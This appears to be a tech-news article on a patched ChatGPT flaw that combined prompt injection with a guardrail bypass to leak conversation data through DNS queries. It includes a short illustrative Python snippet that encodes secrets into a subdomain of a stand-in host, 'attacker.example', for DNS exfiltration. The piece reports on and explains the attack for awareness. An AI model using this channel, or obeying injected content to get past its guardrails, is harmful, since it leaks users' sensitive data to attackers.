‘A hard truth for the AI era: don’t assume AI tools are secure by default’: OpenAI patches flaw allowing silent data leakage from ChatGPT conversations without users ever knowing



  • Check Point Research found ChatGPT flaw enabling silent data exfiltration via DNS abuse and prompt injection
  • Vulnerability allowed attackers to bypass guardrails and steal sensitive user data through covert domain queries
  • OpenAI patched issue on Feb 20, 2026, marking second major fix that week after Codex command injection flaw

OpenAI has patched a vulnerability in ChatGPT that allowed threat actors to silently exfiltrate sensitive data from their targets.

The vulnerability was discovered by security experts from Check Point Research (CPR), who warned that the bug combined old-fashioned prompt injection with a bypass of ChatGPT's built-in guardrails, noting, "AI tools should not be assumed secure by default".
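CPR has not published exploit code, but DNS-based exfiltration in general works by smuggling stolen data into the hostname of a DNS lookup: the victim's resolver forwards the query toward the attacker's authoritative nameserver, which logs it, so no direct HTTP connection to the attacker is ever made. The sketch below is purely illustrative of that covert channel, not CPR's actual technique; the domain name and function are hypothetical.

```python
import base64

# Hypothetical attacker-controlled domain (illustrative only).
ATTACKER_DOMAIN = "attacker.example"

def encode_exfil_hostname(secret: str, domain: str = ATTACKER_DOMAIN) -> str:
    """Encode data into a DNS-safe subdomain label.

    A lookup of the returned hostname leaks `secret` to whoever runs
    the authoritative nameserver for `domain`, even if the lookup
    itself fails to resolve.
    """
    # Base32 is DNS-safe (case-insensitive alphanumerics); strip padding.
    label = base64.b32encode(secret.encode()).decode().rstrip("=").lower()
    # DNS labels max out at 63 bytes; real tooling chunks longer payloads.
    return f"{label[:63]}.{domain}"

# Victim-side "exfiltration" is then just an ordinary name lookup, e.g.
#   socket.gethostbyname(encode_exfil_hostname("api_key=..."))
# The query appears in the attacker's DNS logs without any outbound
# HTTP traffic for the victim's security tools to flag.
```

This is why DNS is attractive as a covert channel: outbound DNS is almost always permitted, and the queried names are rarely inspected.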


